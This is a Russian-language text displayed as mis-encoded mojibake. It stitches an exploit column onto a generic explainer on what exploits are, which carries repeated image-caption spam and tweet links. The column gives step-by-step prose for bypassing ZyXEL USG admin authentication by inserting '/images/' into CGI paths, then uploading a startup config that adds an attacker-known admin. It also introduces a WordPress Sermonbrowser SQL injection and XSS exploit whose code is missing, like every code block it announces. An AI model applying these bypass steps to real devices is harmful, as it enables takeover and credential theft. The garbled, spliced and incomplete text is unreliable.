Π‘Ρ‹Π»ΠΎ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½ΠΎ, Ρ‡Ρ‚ΠΎ Ρ€Π°Π·ΠΌΠ΅Ρ€ Ρ„Π°ΠΉΠ»Π° 221BDQ2C0.conf ΠΈΠ· Π³Π»Π°Π²Π½ΠΎΠ³ΠΎ Π°Ρ€Ρ…ΠΈΠ²Π° Π² точности совпадаСт с Ρ€Π°Π·ΠΌΠ΅Ρ€ΠΎΠΌ Ρ„Π°ΠΉΠ»Π° system-default.conf ΠΈΠ· Π·Π°ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹Ρ… Π°Ρ€Ρ…ΠΈΠ²ΠΎΠ². Π’Π°ΠΊΠΎΠΉ Ρ„Π°ΠΊΡ‚ Π½Π΅ ΠΌΠΎΠΆΠ΅Ρ‚ Π½Π΅ Π½Π°ΠΌΠ΅ΠΊΠ°Ρ‚ΡŒ Π½Π° ΡƒΡΠΏΠ΅ΡˆΠ½ΠΎΠ΅ ΠΏΡ€ΠΈΠΌΠ΅Π½Π΅Π½ΠΈΠ΅ извСстной ΠΈΠ· области ΠΊΡ€ΠΈΠΏΡ‚ΠΎΠ°Π½Π°Π»ΠΈΠ·Π° Π°Ρ‚Π°ΠΊΠΈ с извСстным ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹ΠΌ тСкстом, Ρ‡Ρ‚ΠΎ ΠΈ Π±Ρ‹Π»ΠΎ ΠΏΡ€ΠΎΠ΄Π΅Π»Π°Π½ΠΎ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΡ… ΡƒΡ‚ΠΈΠ»ΠΈΡ‚:

ПослС этого Ρ„Π°ΠΉΠ» с исходной Ρ„Π°ΠΉΠ»ΠΎΠ²ΠΎΠΉ систСмой устройства compress.img раскрываСтся с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ unsquashfs. Устройства ZyWALL USG ΡƒΠΏΡ€Π°Π²Π»ΡΡŽΡ‚ΡΡ ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ Π²Π΅Π±-интСрфСйса Π½Π° сСрвСрС Apache. Π§Ρ‚ΠΎΠ±Ρ‹ Π²ΠΎΠΉΡ‚ΠΈ Ρ‚ΡƒΠ΄Π°, Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΠΎ ΠΏΡ€ΠΎΠΉΡ‚ΠΈ Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΡŽ. ΠœΠΎΠ΄ΡƒΠ»ΡŒ Β«mod_auth_zyxel.soΒ» Ρ€Π΅Π°Π»ΠΈΠ·ΡƒΠ΅Ρ‚ этот Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½Π°Π» ΠΈ настраиваСтся Π² Ρ„Π°ΠΉΠ»Π΅ /etc/service_conf/httpd.conf, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ ΠΌΠΎΠΆΠ½ΠΎ ΠΈΠ·Π²Π»Π΅Ρ‡ΡŒ ΠΈΠ· compress.img. Π’ этом ΠΊΠΎΠ½Ρ„ΠΈΠ³Π΅ Π΅ΡΡ‚ΡŒ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΈΠ²Π° Β«AuthZyxelSkipPatternΒ», которая отмСняСт Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΡŽ для Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… Ρ‚ΠΎΡ‡Π΅ΠΊ:

AuthZyxelSkipPattern /images/ /weblogin.cgi /I18N.js /language

Админский интСрфСйс состоит ΠΈΠ· Π½Π΅ΡΠΊΠΎΠ»ΡŒΠΊΠΈΡ… CGI-скриптов. НапримСр, прослСдуя ΠΏΠΎ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰Π΅ΠΉ ссылкС послС Π»ΠΎΠ³ΠΈΠ½Π° ΠΏΠΎΠ΄ Π°Π΄ΠΌΠΈΠ½ΠΎΠΌ, ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΠΎΠ½Π½Ρ‹ΠΉ Ρ„Π°ΠΉΠ»:

Π‘Π΅Ρ€Π²Π΅Ρ€ Apache Π² стандартной ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΠΈ позволяСт Π΄ΠΎΠ±Π°Π²Π»ΡΡ‚ΡŒ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½Ρ‹Π΅ ΠΏΡƒΡ‚ΠΈ ΠΊ CGI-скриптам. Π’Π°ΠΊΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ, Π΄ΠΎΠ±Π°Π²ΠΈΠ² строку Β«/images/Β» Π² Π²Ρ‹ΡˆΠ΅ΡΡ‚ΠΎΡΡ‰ΡƒΡŽ ссылку, скрипт Β«export-cgiΒ» всС Ρ€Π°Π²Π½ΠΎ ΠΎΡ‚Ρ€Π°Π±ΠΎΡ‚Π°Π΅Ρ‚ ΠΈ выдаст ΠΊΠΎΠ½Ρ„ΠΈΠ³:

А Ρ‚Π°ΠΊ ΠΊΠ°ΠΊ строка Β«/images/Β» присутствуСт Π² Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΈΠ²Π΅ AuthZyxelSkipPattern, Ρ‚ΠΎ эту ссылку ΠΌΠΎΠΆΠ½ΠΎ ΠΎΡ‚ΠΊΡ€Ρ‹Π²Π°Ρ‚ΡŒ Π΄Π°ΠΆΠ΅ Π½Π΅ залогинившись Π² админской ΠΏΠ°Π½Π΅Π»ΠΈ. ΠŸΠΎΠ»ΡƒΡ‡Π΅Π½Π½Ρ‹ΠΉ ΠΊΠΎΠ½Ρ„ΠΈΠ³ содСрТит Ρ‡ΡƒΠ²ΡΡ‚Π²ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹Π΅ Π΄Π°Π½Π½Ρ‹Π΅, Ρ‚Π°ΠΊΠΈΠ΅ ΠΊΠ°ΠΊ Ρ…Π΅ΡˆΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ ΠΈ ΠΏΡ€Π°Π²ΠΈΠ»Π° Ρ„Π°ΠΉΡ€Π²ΠΎΠ»Π°.

ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, Π² административном интСрфСйсС Π΅ΡΡ‚ΡŒ скрипт ΠΏΠΎΠ΄ Π½Π°Π·Π²Π°Π½ΠΈΠ΅ΠΌ Β«file_upload-cgiΒ», ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ, ΠΊΠ°ΠΊ Π»Π΅Π³ΠΊΠΎ Π΄ΠΎΠ³Π°Π΄Π°Ρ‚ΡŒΡΡ, позволяСт Π·Π°Π³Ρ€ΡƒΠΆΠ°Ρ‚ΡŒ Ρ„Π°ΠΉΠ»Ρ‹. ΠŸΡ€ΠΈΠΌΠ΅Π½ΡΡ Π°Π½Π°Π»ΠΎΠ³ΠΈΡ‡Π½Ρ‹ΠΉ Ρ„ΠΈΠ½Ρ‚ со строкой Β«/ images/Β», ΠΌΠΎΠΆΠ½ΠΎ Π·Π°Π³Ρ€ΡƒΠΆΠ°Ρ‚ΡŒ ΠΊΠΎΠ½Ρ„ΠΈΠ³ΠΈ Π±Π΅Π· всякой Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ. К Ρ‚ΠΎΠΌΡƒ ΠΆΠ΅, Ссли Π·Π°Π³Ρ€ΡƒΠΆΠ°Π΅ΠΌΠΎΠΌΡƒ Ρ„Π°ΠΉΠ»Ρƒ Π½Π°Π·Π½Π°Ρ‡ΠΈΡ‚ΡŒ имя Β«startup-config. confΒ», Ρ‚ΠΎ настройки, ΡƒΠΊΠ°Π·Π°Π½Π½Ρ‹Π΅ Π² Π½Π΅ΠΌ, примСнятся Π½Π΅Π·Π°ΠΌΠ΅Π΄Π»ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ. Π’ Π½Π΅Π³ΠΎ ΠΌΠΎΠΆΠ½ΠΎ, Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, Π΄ΠΎΠ±Π°Π²ΠΈΡ‚ΡŒ Π²Ρ‚ΠΎΡ€ΠΎΠ³ΠΎ Π°Π΄ΠΌΠΈΠ½Π° с извСстным Π½Π°ΠΌ ΠΏΠ°Ρ€ΠΎΠ»Π΅ΠΌ.

Π˜Ρ‚Π°ΠΊ, Π΄Π²Π΅ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠ΅ ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ Π΄Π΅ΠΌΠΎΠ½ΡΡ‚Ρ€ΠΈΡ€ΡƒΡŽΡ‚, ΠΊΠ°ΠΊ ΠΌΠΎΠΆΠ½ΠΎ ΡΠΊΠ°Ρ‡Π°Ρ‚ΡŒ/ Π·Π°ΠΊΠ°Ρ‡Π°Ρ‚ΡŒ искомый ΠΊΠΎΠ½Ρ„ΠΈΠ³ ΠΈ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ ΠΏΠΎΠ»Π½Ρ‹ΠΉ доступ ΠΊ устройству:

Targets

ВсС ΠΏΡ€ΠΎΡˆΠΈΠ²ΠΊΠΈ ZyXEL USG, Π²Ρ‹ΠΏΡƒΡ‰Π΅Π½Π½Ρ‹Π΅ Π΄ΠΎ 25 апрСля 2011 Π³ΠΎΠ΄Π°, ΡΠ²Π»ΡΡŽΡ‚ΡΡ уязвимыми.

Solution

Π‘ΠΊΠ°Ρ‡Π°ΠΉ ΠΈ установи ΠΎΠ±Π½ΠΎΠ²Π»Π΅Π½Π½ΡƒΡŽ ΠΏΡ€ΠΎΡˆΠΈΠ²ΠΊΡƒ, Π΄Π°Ρ‚ΠΈΡ€ΠΎΠ²Π°Π½Π½ΡƒΡŽ 25 апрСля, Π»ΠΈΠ±ΠΎ ΠΎΡ‚ΠΊΠ»ΡŽΡ‡ΠΈ административный Π²Π΅Π±-интСрфСйс.

SQL ΠΈΠ½ΡŠΠ΅ΠΊΡ†ΠΈΡ ΠΈ XSS Π² WordPress Sermonbrowser Plugin

CVSSV2

Brief

Π’ ΠΊΠΎΠ½Ρ†Π΅ апрСля Π½Π΅ΠΊΠΈΠΉ Ma3sTr0-Dz ΠΎΠΏΡƒΠ±Π»ΠΈΠΊΠΎΠ²Π°Π» ΠΎΡ‡Π΅Ρ€Π΅Π΄Π½ΠΎΠΉ эксплоит ΠΏΠΎΠ΄ ΠΎΡ‡Π΅Ρ€Π΅Π΄Π½ΠΎΠΉ ΠΏΠ»Π°Π³ΠΈΠ½ для Π’ΠΎΡ€Π΄ΠŸΡ€Π΅ΡΡΠ°. Уязвимости достаточно Ρ‚Ρ€ΠΈΠ²ΠΈΠ°Π»ΡŒΠ½Ρ‹Π΅ β€” это SQL ΠΈΠ½ΡŠΠ΅ΠΊΡ†ΠΈΡ ΠΈ мСТсайтовый скриптинг. Π’ Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ эксплуатации ΠΏΠ΅Ρ€Π²ΠΎΠΉ ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ Ρ…Π΅Ρˆ Π°Π΄ΠΌΠΈΠ½Π°, Π² Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ Π²Ρ‚ΠΎΡ€ΠΎΠΉ β€” ΠΊΡƒΠΊΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ (Π² Ρ‚ΠΎΠΌ числС ΠΈ Π°Π΄ΠΌΠΈΠ½Π°).

Exploit

Эксплоит написан Π½Π° php, ΠΏΡ€ΠΈ Π΅Π³ΠΎ запускС Π² качСствС ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Π° Π½ΡƒΠΆΠ½ΠΎ всСго лишь ΡƒΠΊΠ°Π·Π°Ρ‚ΡŒ ссылку Π½Π° уязвимый сайт, дальшС скрипт всС сдСлаСт сам. Π’ΠΎΡ‚ Π΅Π³ΠΎ ΠΊΠΎΠ΄ (ΠΈΡΠΊΠ»ΡŽΡ‡ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ для ознакомлСния):

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ

Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты ΠΈ ΠΏΠΎΡ‡Π΅ΠΌΡƒ ΠΈΡ… всС Ρ‚Π°ΠΊ боятся?

Π Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊΠΈ Π·Π°Ρ‰ΠΈΡ‚Π½Ρ‹Ρ… Ρ€Π΅ΡˆΠ΅Π½ΠΈΠΉ часто ΡƒΠΏΠΎΠΌΠΈΠ½Π°ΡŽΡ‚ эксплойты ΠΊΠ°ΠΊ ΠΎΠ΄Π½Ρƒ ΠΈΠ· самых ΡΠ΅Ρ€ΡŒΡ‘Π·Π½Ρ‹Ρ… ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌ бСзопасности Π΄Π°Π½Π½Ρ‹Ρ… ΠΈ систСм, хотя ΠΈ Π½Π΅ всСгда ясно, ΠΏΠΎΡ‡Π΅ΠΌΡƒ. ΠŸΠΎΠΏΡ€ΠΎΠ±ΡƒΠ΅ΠΌ Ρ€Π°Π·ΠΎΠ±Ρ€Π°Ρ‚ΡŒΡΡ Π² этом вопросС

Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом

Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом

Π Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊΠΈ Π·Π°Ρ‰ΠΈΡ‚Π½Ρ‹Ρ… Ρ€Π΅ΡˆΠ΅Π½ΠΈΠΉ часто ΡƒΠΏΠΎΠΌΠΈΠ½Π°ΡŽΡ‚ Π² своих публикациях эксплойты ΠΊΠ°ΠΊ ΠΎΠ΄Π½Ρƒ ΠΈΠ· самых ΡΠ΅Ρ€ΡŒΠ΅Π·Π½Ρ‹Ρ… ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌ бСзопасности Π΄Π°Π½Π½Ρ‹Ρ… ΠΈ систСм, хотя ΠΈ Π½Π΅ всСгда ясно, ΠΊΠ°ΠΊΠΎΠ²Π° Ρ€Π°Π·Π½ΠΈΡ†Π° ΠΌΠ΅ΠΆΠ΄Ρƒ эксплойтами ΠΈ врСдоносными ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°ΠΌΠΈ Π² Ρ†Π΅Π»ΠΎΠΌ. ΠŸΠΎΠΏΡ€ΠΎΠ±ΡƒΠ΅ΠΌ Ρ€Π°Π·ΠΎΠ±Ρ€Π°Ρ‚ΡŒΡΡ с этим вопросом.

Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойт?

Эксплойты β€” это ΠΏΠΎΠ΄Π²ΠΈΠ΄ врСдоносных ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ. Они содСрТат Π΄Π°Π½Π½Ρ‹Π΅ ΠΈΠ»ΠΈ исполняСмый ΠΊΠΎΠ΄, способный Π²ΠΎΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒΡΡ ΠΎΠ΄Π½ΠΎΠΉ ΠΈΠ»ΠΈ нСсколькими уязвимостями Π² ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½ΠΎΠΌ обСспСчСнии Π½Π° локальном ΠΈΠ»ΠΈ ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠΌ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π΅.

НапримСр, Ρƒ вас Π΅ΡΡ‚ΡŒ Π±Ρ€Π°ΡƒΠ·Π΅Ρ€, ΠΈ Π΅ΡΡ‚ΡŒ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² Π½Π΅ΠΌ, которая позволяСт ΠΈΡΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ Β«ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½Ρ‹ΠΉ ΠΊΠΎΠ΄Β», Ρ‚ΠΎ Π΅ΡΡ‚ΡŒ ΡƒΡΡ‚Π°Π½ΠΎΠ²ΠΈΡ‚ΡŒ ΠΈ Π·Π°ΠΏΡƒΡΡ‚ΠΈΡ‚ΡŒ Π½Π΅ΠΊΡƒΡŽ Π²Ρ€Π΅Π΄ΠΎΠ½ΠΎΡΠ½ΡƒΡŽ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡƒ Π½Π° вашСй систСмС Π±Π΅Π· вашСго Π²Π΅Π΄ΠΎΠΌΠ° ΠΈΠ»ΠΈ ΡΠΏΡ€ΠΎΠ²ΠΎΡ†ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ ΠΊΠ°ΠΊΠΎΠ΅-Π»ΠΈΠ±ΠΎ ΠΈΠ½ΠΎΠ΅ Π½Π΅ ΠΎΠΆΠΈΠ΄Π°Π΅ΠΌΠΎΠ΅ Π²Π°ΠΌΠΈ ΠΏΠΎΠ²Π΅Π΄Π΅Π½ΠΈΠ΅ систСмы. Π§Π°Ρ‰Π΅ всСго ΠΏΠ΅Ρ€Π²Ρ‹ΠΌ шагом Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΎΠ² становится ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ, ΠΏΠΎΠ·Π²ΠΎΠ»ΡΡŽΡ‰Π΅Π΅ Π΄Π΅Π»Π°Ρ‚ΡŒ Π² Π°Ρ‚Π°ΠΊΡƒΠ΅ΠΌΠΎΠΉ систСмС всС, Ρ‡Ρ‚ΠΎ Π² Π³ΠΎΠ»ΠΎΠ²Ρƒ Π²Π·Π±Ρ€Π΅Π΄Π΅Ρ‚.

Microsoft Π·Π°ΠΊΡ€Ρ‹Π»Π° ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π½ΡƒΠ»Π΅Π²ΠΎΠ³ΠΎ дня Π² Windows ΠΈ Π°ΠΆ 41 Π΄Ρ‹Ρ€ΠΊΡƒ Π² Internet Explorer, Π½ΠΎ Π±Ρ€Π΅ΡˆΠΈ Π΅Ρ‰Π΅ ΠΎΡΡ‚Π°Π»ΠΈΡΡŒ: http://t.co/RzSNpPd3oH

Π‘Ρ€Π°ΡƒΠ·Π΅Ρ€Ρ‹ наряду с Flash, Java ΠΈ Microsoft Office ΡΠ²Π»ΡΡŽΡ‚ΡΡ ΠΎΠ΄Π½ΠΈΠΌΠΈ ΠΈΠ· самых ΠΏΠΎΠ΄Π²Π΅Ρ€ΠΆΠ΅Π½Π½Ρ‹Ρ… Π°Ρ‚Π°ΠΊΠ°ΠΌ ΠΊΠ°Ρ‚Π΅Π³ΠΎΡ€ΠΈΠΉ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½ΠΎΠ³ΠΎ обСспСчСния. Из-Π·Π° ΠΈΡ… повсСмСстности ΠΈΡ… Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎ ΠΈΡΡΠ»Π΅Π΄ΡƒΡŽΡ‚ ΠΊΠ°ΠΊ экспСрты ΠΏΠΎ бСзопасности, Ρ‚Π°ΠΊ ΠΈ Ρ…Π°ΠΊΠ΅Ρ€Ρ‹, Π° Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊΠΈ Π±Ρ€Π°ΡƒΠ·Π΅Ρ€ΠΎΠ² Π²Ρ‹Π½ΡƒΠΆΠ΄Π΅Π½Ρ‹ рСгулярно Π²Ρ‹ΠΏΡƒΡΠΊΠ°Ρ‚ΡŒ ΠΏΠ°Ρ‚Ρ‡ΠΈ для исправлСния уязвимостСй. Π›ΡƒΡ‡ΡˆΠ΅ всСго эти ΠΏΠ°Ρ‚Ρ‡ΠΈ ΡƒΡΡ‚Π°Π½Π°Π²Π»ΠΈΠ²Π°Ρ‚ΡŒ сразу, Π½ΠΎ, ΠΊ соТалСнию, Ρ‚Π°ΠΊ происходит Π΄Π°Π»Π΅ΠΊΠΎ Π½Π΅ всСгда β€” вСдь ΠΏΡ€ΠΈ этом придСтся Π·Π°ΠΊΡ€Ρ‹Π²Π°Ρ‚ΡŒ всС Π²ΠΊΠ»Π°Π΄ΠΊΠΈ.

ΠžΡΠΎΠ±ΡƒΡŽ ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΡƒ, ΠΊΠΎΠ½Π΅Ρ‡Π½ΠΎ, ΠΏΡ€Π΅Π΄ΡΡ‚Π°Π²Π»ΡΡŽΡ‚ собой эксплойты нСизвСстных уязвимостСй, ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½Π½Ρ‹Ρ… ΠΈ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Π½Π½Ρ‹Ρ… прСступниками, β€” Ρ‚Π°ΠΊ Π½Π°Π·Ρ‹Π²Π°Π΅ΠΌΡ‹Π΅ уязвимости Π½ΡƒΠ»Π΅Π²ΠΎΠ³ΠΎ дня. ΠœΠΎΠΆΠ΅Ρ‚ ΠΏΡ€ΠΎΠΉΡ‚ΠΈ ΠΌΠ½ΠΎΠ³ΠΎ Π²Ρ€Π΅ΠΌΠ΅Π½ΠΈ, ΠΏΡ€Π΅ΠΆΠ΄Π΅ Ρ‡Π΅ΠΌ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ΄ΠΈΡ‚Π΅Π»ΠΈ ΡƒΠ·Π½Π°ΡŽΡ‚ ΠΎ Π½Π°Π»ΠΈΡ‡ΠΈΠΈ ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΡ‹ ΠΈ устранят Π΅Π΅.

Как происходит Π·Π°Ρ€Π°ΠΆΠ΅Π½ΠΈΠ΅

Π‘Π»Π΅Π΄ΡƒΡŽΡ‰Π°Ρ Ρ‡Π°ΡΡ‚ΡŒ Π²ΠΏΠΎΠ»Π½Π΅ тСхничСская, Ρ‚Π°ΠΊ Ρ‡Ρ‚ΠΎ Π½Π΅ ΡΡ‚Π΅ΡΠ½ΡΠΉΡ‚Π΅ΡΡŒ ΠΏΡ€ΠΎΠΌΠ°Ρ‚Ρ‹Π²Π°Ρ‚ΡŒ, Ссли Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Π²Π°ΠΌ Π½Π΅ Π² самом Π΄Π΅Π»Π΅ интСрСсно, ΠΊΠ°ΠΊ это Ρ€Π°Π±ΠΎΡ‚Π°Π΅Ρ‚. Π˜ΠΌΠ΅ΠΉΡ‚Π΅ Π² Π²ΠΈΠ΄Ρƒ ΠΏΡ€ΠΈ этом, Ρ‡Ρ‚ΠΎ кибСрпрСступники часто ΠΏΡ€Π΅Π΄ΠΏΠΎΡ‡ΠΈΡ‚Π°ΡŽΡ‚ эксплойты ΠΏΡ€ΠΎΡ‡ΠΈΠΌ ΠΌΠ΅Ρ‚ΠΎΠ΄Π°ΠΌ зараТСния, Ρ‚Π°ΠΊ ΠΊΠ°ΠΊ, Π² ΠΎΡ‚Π»ΠΈΡ‡ΠΈΠ΅ ΠΎΡ‚ ΡΠΎΡ†ΠΈΠ°Π»ΡŒΠ½ΠΎΠΉ ΠΈΠ½ΠΆΠ΅Π½Π΅Ρ€ΠΈΠΈ, Π² ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ всС дСлаСтся Π½Π°ΡƒΠ΄Π°Ρ‡Ρƒ, эксплуатация уязвимостСй Π½Π΅ΠΈΠ·ΠΌΠ΅Π½Π½ΠΎ Π΄Π°Π΅Ρ‚ ΠΆΠ΅Π»Π°Π΅ΠΌΡ‹ΠΉ Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚.

Π•ΡΡ‚ΡŒ Π΄Π²Π° способа Β«ΡΠΊΠΎΡ€ΠΌΠΈΡ‚ΡŒΒ» ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡΠΌ эксплойты. Π’ΠΎ-ΠΏΠ΅Ρ€Π²Ρ‹Ρ…, ΠΏΡ€ΠΈ посСщСнии ΠΈΠΌΠΈ сайта, содСрТащСго врСдоносный ΠΊΠΎΠ΄ эксплойта. Π’ΠΎ-Π²Ρ‚ΠΎΡ€Ρ‹Ρ…, ΠΏΡ€ΠΈ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΈΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΌ Π±Π΅Π·ΠΎΠ±ΠΈΠ΄Π½ΠΎΠ³ΠΎ Π½Π° Π²ΠΈΠ΄ Ρ„Π°ΠΉΠ»Π° со скрытым врСдоносным ΠΊΠΎΠ΄ΠΎΠΌ. Как Π»Π΅Π³ΠΊΠΎ Π΄ΠΎΠ³Π°Π΄Π°Ρ‚ΡŒΡΡ, Π²ΠΎ Π²Ρ‚ΠΎΡ€ΠΎΠΌ случаС для доставки эксплойта, ΠΊΠ°ΠΊ ΠΏΡ€Π°Π²ΠΈΠ»ΠΎ, ΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ΡΡ спамом ΠΈΠ»ΠΈ Ρ„ΠΈΡˆΠΈΠ½Π³ΠΎΠ²Ρ‹ΠΌ письмом.

ΠŸΠΎΡ‡Π΅ΠΌΡƒ Ρ„ΠΈΡˆΠΈΠ½Π³ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΠ» Ρ‚Π°ΠΊΠΎΠ΅ распространСниС ΠΈ ΠΊΠ°ΠΊ ΠΎΡ‚ Π½Π΅Π³ΠΎ ΡƒΠ±Π΅Ρ€Π΅Ρ‡ΡŒΡΡ: http://t.co/sezy73TbSb

